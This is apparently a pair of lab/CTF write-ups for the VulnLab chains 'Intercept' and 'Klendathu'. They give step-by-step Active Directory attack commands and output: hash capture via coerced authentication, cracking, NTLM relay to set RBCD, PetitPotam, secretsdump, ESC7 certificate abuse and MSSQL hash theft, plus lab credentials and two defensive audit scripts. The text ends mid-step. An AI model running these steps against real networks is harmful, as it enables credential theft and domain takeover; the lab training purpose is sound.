Author: admin
vulnlab intercept
Intercept is a hard-rated chain which contains two machines, WS01 and DC01. The chain starts with forced authentication via a file upload to grab a user's hash. Using this user we performed the Resource-Based Constrained Delegation (RBCD) WebClient attack to escalate privileges. Finally, using ESC7, we elevate privileges to Domain Admin.
$ smbclient -L \\\\ws01.intercept.vl
Password for [WORKGROUP\puck]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	dev             Disk      shared developer workspace
	IPC$            IPC       Remote IPC
	Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to ws01.intercept.vl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Upload files to the SMB share and capture the resulting authentication hashes with smbserver.py or Responder.
$ impacket-smbserver share share -smb2support Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.250.118,63690) [*] AUTHENTICATE_MESSAGE (INTERCEPT\Kathryn.Spencer,WS01) [*] User WS01\Kathryn.Spencer authenticated successfully [*] Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:01010000000000008055d8e29dfeda01350bcbc48ec2e8230000000001001000520058006b004200550077007300630003001000520058006b0042005500770073006300020010006b00410053007600490063004d006e00040010006b00410053007600490063004d006e00070008008055d8e29dfeda0106000400020000000800300030000000000000000000000000200000e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000 [*] Connecting Share(1:IPC$) [-] SMB2_TREE_CONNECT not found x
$ smbclient \\\\ws01.intercept.vl\\dev
Next we crack the hash.
The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked
Try spraying the password against the other domain users.
ldapsearch -x -LLL -H ldap://dc01.intercept.vl -D 'kathryn.spencer@intercept.vl' -b 'DC=intercept,DC=vl' -w 'Chocolate1' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt
netexec smb ws01.intercept.vl -u allusers.txt -p Chocolate1 --continue-on-success
But no result.
I also use ldapdomaindump to get some domain info in HTML format
python -m ldapdomaindump -u 'intercept.vl\Kathryn.Spencer' -p 'Chocolate1' -o ldap/ 10.10.145.245
Next we do some BloodHound analysis.
$ bloodhound-python -c all --disable-pooling -w 1 -u kathryn.spencer -p 'Chocolate1' -d intercept.vl -dc dc01.intercept.vl -ns 10.10.145.245 --dns-tcp --zip --dns-timeout 120
Check LDAP signing [ not enforced = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M ldap-checker
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1
LDAP-CHE... 10.10.250.117   389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.250.117   389    DC01             LDAPS Channel Binding is set to "NEVER"
Check Machine Quota [ 10 = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M maq
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1
MAQ         10.10.250.117   389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.250.117   389    DC01             MachineAccountQuota: 10
Check whether the WebDAV service is enabled as well [ enabled = not default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M webdav
RBCD WebClient Attack
Now that we know that the WebDAV service is active on WS01, LDAP signing is not enforced on the DC, and we can add machine accounts to the domain, we can abuse these conditions in combination with coerced authentication to escalate privileges. However, when relaying the coerced authentication to add RBCD permissions on WS01, the WebClient only authenticates to a host it considers part of the trusted intranet zone, so our relay host needs a DNS name inside the domain. Luckily for us, by default the "Authenticated Users" group can create child objects in the ADIDNS zone.
Preparing
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install ldap3 dnspython
$ pip install ldapdomaindump
$ git clone https://github.com/CoreSecurity/impacket.git
$ cd impacket
$ python setup.py install
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept/impacket]
└─$ ntlmrelayx.py -t ldaps://10.10.250.117 --delegate-access -smb2support
└─$ deactivate
$ git clone https://github.com/dirkjanm/krbrelayx.git
Here it goes.
Set your local DNS server to the DC IP in /etc/resolv.conf before running.
┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ cat /etc/resolv.conf
# Generated by NetworkManager
search home
nameserver 10.10.177.37
Add a new DNS entry that points to our attacker machine.
$ python3 ./krbrelayx/dnstool.py -u 'INTERCEPT.vl\Kathryn.Spencer' dc01.intercept.vl --tcp -p Chocolate1 -a add -t A -r kali.intercept.vl -d 10.8.2.138
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Verify that the A record for our attacker machine was created.
$ nslookup kali.intercept.vl 10.10.177.37
Server:		10.10.177.37
Address:	10.10.177.37#53

Name:	kali.intercept.vl
Address: 10.8.2.138
Add a new machine account.
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-addcomputer -computer-name 'WS02$' -computer-pass 'Start123!' -dc-host dc01.intercept.vl -domain-netbios intercept 'INTERCEPT/Kathryn.Spencer:Chocolate1'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account WS02$ with password Start123!.
Start the listener that relays the authentication to LDAP on the DC in order to configure RBCD on WS01$ (a computer account is allowed to write its own attribute).
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ sudo impacket-ntlmrelayx -smb2support -t ldaps://dc01.intercept.vl --http-port 8080 --delegate-access --escalate-user WS02\$ --no-dump --no-acl --no-da
[sudo] password for puck:
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 8080
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, attacking target ldaps://dc01.intercept.vl
[*] HTTPD(8080): Authenticating against ldaps://dc01.intercept.vl as INTERCEPT/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, but there are no more targets left!
[*] Delegation rights modified succesfully!
[*] WS02$ can now impersonate users on WS01$ via S4U2Proxy
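As an added defensive example (not code from this writeup or from impacket), the Python below parses the security descriptor that the relay above writes into msDS-AllowedToActOnBehalfOfOtherIdentity on WS01$ and reports every principal it grants delegation to. The SID for WS02$ is a constructed sample value, and build_rbcd_descriptor exists only to produce sample input for the parser.

```python
import struct

# Access mask that --delegate-access puts in the ACE (full control) and the
# security-descriptor constants needed to walk a self-relative descriptor.
RBCD_FULL_CONTROL = 0x000F01FF
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' into the binary SID layout: revision, sub-authority
    count, 48-bit big-endian identifier authority, little-endian sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("malformed SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, off: int) -> str:
    """Decode a binary SID starting at buf[off] back into 'S-...' form."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def build_rbcd_descriptor(allowed_sids) -> bytes:
    """Constructed sample only: a self-relative security descriptor whose DACL
    holds one ACCESS_ALLOWED_ACE per SID, the shape found in the attribute."""
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        # ACE header (type, flags, size), then the access mask and the SID.
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_bytes), RBCD_FULL_CONTROL) + sid_bytes
    # ACL header: revision 4 (ACL_REVISION_DS), pad, size, ACE count, pad.
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    # SD header: revision 1, pad, control, owner/group/SACL offsets (absent),
    # DACL offset (the 20-byte header is followed directly by the ACL).
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         0, 0, 0, 20)
    return header + acl


def rbcd_allowed_principals(sd: bytes):
    """Return [(sid, access_mask)] for every ACCESS_ALLOWED_ACE in the DACL,
    i.e. every principal that may run S4U2Proxy against this computer."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1:
        raise ValueError("unsupported security descriptor revision %d" % revision)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []  # no DACL at all: nobody is allowed to delegate
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos = dacl_off + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", sd, pos + 4)[0]
            allowed.append((bytes_to_sid(sd, pos + 8), mask))
        pos += ace_size  # skip other ACE types using their declared size
    return allowed


def audit_rbcd(host: str, sd: bytes, expected_sids=()) -> list:
    """One finding per principal in the DACL that is not on the expected list;
    a workstation like WS01$ normally has an empty attribute, so anything
    appearing here after a relay is the indicator to alert on."""
    findings = []
    for sid, mask in rbcd_allowed_principals(sd):
        if sid not in expected_sids:
            findings.append("%s: unexpected RBCD trust for %s (mask 0x%08X)"
                            % (host, sid, mask))
    return findings


# Constructed sample values (not from the lab): the SID the new WS02$ received.
SAMPLE_WS02_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
SAMPLE_SD = build_rbcd_descriptor([SAMPLE_WS02_SID])

if __name__ == "__main__":
    for line in audit_rbcd("WS01$", SAMPLE_SD):
        print(line)
```

In a real audit the bytes come from the attribute value returned by an LDAP query for computers where msDS-AllowedToActOnBehalfOfOtherIdentity is set.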
Coerce authentication from the workstation WS01$ using a non-default port, so that it is a WebDAV (HTTP) authentication rather than SMB.
┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ python3 ./krbrelayx/PetitPotam.py -d intercept.vl -u 'Kathryn.Spencer' -p 'Chocolate1' kali@8080/a ws01.intercept.vl

PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)

Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:ws01.intercept.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Impersonate Administrator on WS01 using our RBCD privileges.
┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-getST -spn cifs/ws01.intercept.vl intercept.vl/WS02\$ -impersonate administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:Start123!
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
$ export KRB5CCNAME=administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
$ impacket-secretsdump -k -no-pass ws01.intercept.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:83<redacted>82:::
..snip..
[*] _SC_HelpdeskService
Simon.Bowen@intercept.vl:b0OI_fHO859+Aw
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
What a ride
Next, using Certipy to enumerate AD CS, we can see that one of the groups holding the ManageCA permission is the ca-managers group, over which simon.bowen has GenericAll permissions.
$ certipy-ad find -username 'Simon.Bowen' -password 'b0OI_fHO859+Aw' -vulnerable -dc-ip 10.10.145.245 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'intercept-DC01-CA' via CSRA
[*] Got CA configuration for 'intercept-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : intercept-DC01-CA
    DNS Name                            : DC01.intercept.vl
    Certificate Subject                 : CN=intercept-DC01-CA, DC=intercept, DC=vl
    Certificate Serial Number           : 4CEE597D2BE3DC9E4F5CDA8401EA6373
    Certificate Validity Start          : 2023-06-27 13:24:59+00:00
    Certificate Validity End            : 2124-09-05 07:48:03+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INTERCEPT.VL\Administrators
      Access Rights
        Enroll                          : INTERCEPT.VL\Authenticated Users
        ManageCa                        : INTERCEPT.VL\ca-managers
                                          INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
        ManageCertificates              : INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
    [!] Vulnerabilities
      ESC7                              : 'INTERCEPT.VL\\ca-managers' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
Since simon.bowen is part of a group that has control over the ca-managers group, he can write himself into that group.
net rpc group addmem "ca-managers" "Simon.Bowen" -U "intercept.vl"/"Simon.Bowen"%"<simon's password :)>" -S <dc01 IP>
ESC7 Exploitation
Now that we have a user with the ManageCA permission on the CA, we can abuse ESC7.
Add the user as an officer
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -add-officer simon.bowen
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'
Enable the SubCA template. This template is configured by default to allow authentication, so we enable it for use.
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -enable-template SubCA
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'
Now request a certificate with the userPrincipalName (UPN) of the Administrator. This request is automatically denied; however, since Simon is an officer, we can manually issue the certificate.
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -template SubCA -upn 'Administrator@intercept.vl'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 6
Would you like to save the private key? (y/N) y
[*] Saved private key to 6.key
[-] Failed to request certificate
Issue the request
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -issue-request 6
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
Get the certificate
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -retrieve 6
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 6
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator@intercept.vl'
[*] Certificate has no object SID
[*] Loaded private key from '6.key'
[*] Saved certificate and private key to 'administrator.pfx'
Authenticate with the PFX to the DC
$ certipy-ad auth -pfx administrator.pfx -domain intercept.vl -username administrator -dc-ip '10.10.145.245'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@intercept.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad<redacted>1f
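As an added example (not part of this writeup or of Certipy), the Python below reads the Permissions block that certipy-ad find -stdout printed earlier and flags the ESC7 condition it reports: any ManageCa or ManageCertificates holder outside the built-in admin groups. The input is a constructed excerpt that mirrors the CA block shown above.

```python
# Constructed excerpt in the layout `certipy-ad find -stdout` prints; the values
# mirror the intercept-DC01-CA block above, so the expected finding is ca-managers.
SAMPLE_CERTIPY = r"""
Certificate Authorities
  0
    CA Name                             : intercept-DC01-CA
    DNS Name                            : DC01.intercept.vl
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Permissions
      Owner                             : INTERCEPT.VL\Administrators
      Access Rights
        Enroll                          : INTERCEPT.VL\Authenticated Users
        ManageCa                        : INTERCEPT.VL\ca-managers
                                          INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
        ManageCertificates              : INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
    [!] Vulnerabilities
      ESC7                              : 'INTERCEPT.VL\\ca-managers' has dangerous permissions
"""

# Groups that hold CA administration rights on a default installation.
DEFAULT_CA_ADMINS = {"domain admins", "enterprise admins", "administrators"}


def parse_access_rights(text):
    """Return {right: [principals]} from the CA 'Access Rights' block. A line with
    ':' starts a new right; a deeper-indented line without ':' continues the last
    one; the block ends at the first line indented no deeper than 'Access Rights'."""
    rights, current, block_indent = {}, None, None
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if block_indent is None:
            if line.strip() == "Access Rights":
                block_indent = indent
            continue
        if indent <= block_indent:
            break  # left the Access Rights block (e.g. the Vulnerabilities section)
        name, sep, principal = line.strip().partition(":")
        if sep:
            current = name.strip()
            rights[current] = [principal.strip()]
        elif current is not None:
            rights[current].append(name.strip())
    return rights


def esc7_findings(rights, trusted=DEFAULT_CA_ADMINS):
    """Flag every ManageCa / ManageCertificates holder outside the trusted set.
    ManageCa is the right the chain above relies on (it allows adding officers and
    enabling templates), so it is reported with the higher severity."""
    findings = []
    for right, severity in (("ManageCa", "CRITICAL"), ("ManageCertificates", "HIGH")):
        for principal in rights.get(right, []):
            # Strip the 'DOMAIN\' prefix and compare the group name case-insensitively.
            account = principal.rsplit("\\", 1)[-1].lower()
            if account not in trusted:
                findings.append((severity, right, principal))
    return findings


def audit_ca_output(text):
    """Convenience wrapper: certipy text in, list of (severity, right, principal) out."""
    return esc7_findings(parse_access_rights(text))


if __name__ == "__main__":
    for severity, right, principal in audit_ca_output(SAMPLE_CERTIPY):
        print("%s: %s holds %s" % (severity, principal, right))
```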
Check that the hash works.
$ netexec smb dc01.intercept.vl -u Administrator -H ad<redacted>1f
$ evil-winrm -i 10.10.145.245 -u Administrator -H 'ad<redacted>1f'
This was super fun.
Resources
vulnlab-klendathu
Klendathu, an insane-rated AD chain.
Solved with: an NFS share containing a config file with the password hash of zim@klendathu.vl; guest access on the MSSQL service; forcing authentication with sys.dm_os_file_exists; forging a silver ticket and then escalating privileges on SRV1; spoofing a domain user on SRV2 with the MSSQL user; and then using ntdissector, a Swiss army knife for NTDS.dit files, and decrypting RDCMan credentials with the domain backup key using rdgdec.py.
NFS Enum
$ showmount -e srv2.klendathu.vl
Export list for srv2.klendathu.vl:
/mnt/nfs_shares *

$ sudo mount -t nfs srv2.klendathu.vl:/mnt/nfs_shares /home/puck/vulnlab/klendathu/shares
(puck㉿kali)-[~/vulnlab/klendathu/shares]
$ cat Switch344_running-config.cfg
Switch344#show running-config
Building configuration...

Current configuration : 4716 bytes
version 12.2
..snip..
enable secret 5 $1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/
enable password C1sc0
..snip..
snmp-server community public RO
snmp-server contact ZIM@KLENDATHU.VL
!
end

Switch344#
$ ./kerbrute_linux_amd64 userenum -d klendathu.vl --dc dc1.klendathu.vl ./users.txt -v

Version: v1.0.3 (9dad6e1) - 08/29/24 - Ronnie Flathers @ropnop

2024/08/29 10:14:58 >  Using KDC(s):
2024/08/29 10:14:58 >  	dc1.klendathu.vl:88

2024/08/29 10:14:58 >  [!] %q - %v Bad username: blank
2024/08/29 10:14:58 >  [+] VALID USERNAME:	 administrator@klendathu.vl
2024/08/29 10:14:58 >  [!] guest@klendathu.vl - USER LOCKED OUT
2024/08/29 10:15:03 >  [+] VALID USERNAME:	 zim@klendathu.vl
2024/08/29 10:15:03 >  Done! Tested 4 usernames (2 valid) in 5.043 seconds
$ hashcat -a 0 -m 500 ./ciscosecret.txt /usr/share/wordlists/rockyou.txt --force
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:fo<redacted>22
$ netexec smb dc1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB         10.10.220.149   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.149   445    DC1              [+] KLENDATHU.VL\zim:football22
SMB         10.10.220.149   445    DC1              [*] Enumerated shares
SMB         10.10.220.149   445    DC1              Share           Permissions     Remark
SMB         10.10.220.149   445    DC1              -----           -----------     ------
SMB         10.10.220.149   445    DC1              ADMIN$                          Remote Admin
SMB         10.10.220.149   445    DC1              C$                              Default share
SMB         10.10.220.149   445    DC1              HomeDirs        READ
SMB         10.10.220.149   445    DC1              IPC$            READ            Remote IPC
SMB         10.10.220.149   445    DC1              NETLOGON        READ            Logon server share
SMB         10.10.220.149   445    DC1              SYSVOL          READ            Logon server share
$ netexec smb srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22' --shares
SMB         10.10.220.150   445    SRV1             [*] Windows Server 2022 Build 20348 x64 (name:SRV1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)
SMB         10.10.220.150   445    SRV1             [+] KLENDATHU.VL\zim:football22
SMB         10.10.220.150   445    SRV1             [*] Enumerated shares
SMB         10.10.220.150   445    SRV1             Share           Permissions     Remark
SMB         10.10.220.150   445    SRV1             -----           -----------     ------
SMB         10.10.220.150   445    SRV1             ADMIN$                          Remote Admin
SMB         10.10.220.150   445    SRV1             C$                              Default share
SMB         10.10.220.150   445    SRV1             IPC$            READ            Remote IPC
$ impacket-smbclient zim@dc1.klendathu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:fo<redacted>22
Type help for list of commands
# shares
ADMIN$
C$
HomeDirs
IPC$
NETLOGON
SYSVOL
# use HomeDirs
# ls
drw-rw-rw-          0  Thu Apr 11 02:58:10 2024 .
drw-rw-rw-          0  Mon Apr 15 18:09:19 2024 ..
drw-rw-rw-          0  Fri Apr 12 06:07:56 2024 CLEA
drw-rw-rw-          0  Fri Apr 12 06:08:12 2024 DUNN
drw-rw-rw-          0  Sat Apr 13 03:32:21 2024 JENKINS
drw-rw-rw-          0  Fri Apr 12 06:08:59 2024 SHUJUMI
# cd CLEA
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
Bloodhound Enum
$ bloodhound-python -d klendathu.vl -c all -u zim -p fo<redacted>22 -ns 10.10.220.149 --zip
INFO: Found AD domain: klendathu.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc1.klendathu.vl
INFO: Found 26 users
INFO: Found 57 groups
INFO: Found 6 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: srv2.klendathu.vl
INFO: Querying computer: SRV1.KLENDATHU.VL
INFO: Querying computer: WS1.KLENDATHU.VL
INFO: Querying computer: DC1.KLENDATHU.VL
INFO: Done in 00M 05S
INFO: Compressing output into 20240829103520_bloodhound.zip
MSSQL access
We have MSSQL running on SRV1, so we check whether we can log in there.
$ netexec mssql srv1.klendathu.vl -u 'zim' -p 'fo<redacted>22'
MSSQL       10.10.220.150   1433   SRV1             [*] Windows Server 2022 Build 20348 (name:SRV1) (domain:KLENDATHU.VL)
MSSQL       10.10.220.150   1433   SRV1             [+] KLENDATHU.VL\zim:foo<redacted>22
$ impacket-mssqlclient klendathu.vl/zim:'fo<redacted>22'@srv1.klendathu.vl -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SRV1\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (KLENDATHU\ZIM  guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (KLENDATHU\ZIM  guest@master)> SELECT user_name()
-----
guest

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist 'C:\'
File Exists   File is a Directory   Parent Directory Exists
-----------   -------------------   -----------------------
          0                     1                         1

SQL (KLENDATHU\ZIM  guest@master)> xp_fileexist '\\10.8.2.138\puck:\'
File Exists   File is a Directory   Parent Directory Exists
-----------   -------------------   -----------------------
          0                     0                         0

SQL (KLENDATHU\ZIM  guest@master)> SELECT * FROM sys.dm_os_file_exists('\\10.8.2.138\puck\')
file_exists   file_is_a_directory   parent_directory_exists
-----------   -------------------   -----------------------
ERROR: Line 1: The operating system returned the error '0x80070005(Access is denied.)' while attempting 'SvlPathDoesPathExist' on '\\10.8.2.138\puck\'.
SQL (KLENDATHU\ZIM  guest@master)>
We are only guest, but we can use SELECT * FROM sys.dm_os_file_exists with a UNC path to capture (with Responder) the hash of the service account that runs the MSSQL service.
responder -I tun0
[+] Current Session Variables:
    Responder Machine Name     [WIN-GUNQV4VD574]
    Responder Domain Name      [0N40.LOCAL]
    Responder DCE-RPC Port     [47623]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.220.150
[SMB] NTLMv2-SSP Username : KLENDATHU\RASCZAK
[SMB] NTLMv2-SSP Hash     : RASCZAK::KLENDATHU:fc8c0f83e62ac68d:CCC3AE57C3615A1CD355265E9D4860BA:01<redacted>00
$ hashcat -a 0 -m 5600 ./rasczak.hash /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting

this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

RASCZAK::KLENDATHU:fc8c0f83e62ac68d:ccc3ae57c3615a1cd355265e9d4860ba:010<redacted>00:st<redacted>99
Forging Silver Ticket
The MSSQL service runs as the RASCZAK user, so we create a silver ticket for that account.
ldapdomaindump
$ ldapdomaindump klendathu.vl -u 'klendathu\rasczak' -p 'st<redacted>99'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Grep the dump to get the domain SID.
$ cat domain_users.grep | grep RAS
RASCZAK	RASCZAK	RASCZAK	Domain Users	04/11/24 00:35:58	08/29/24 07:55:28	08/29/24 07:55:28	NORMAL_ACCOUNT	04/12/24 03:46:53	S-1-5-21-641890747-1618203462-755025521-1131
Convert the plaintext password into an NT hash.
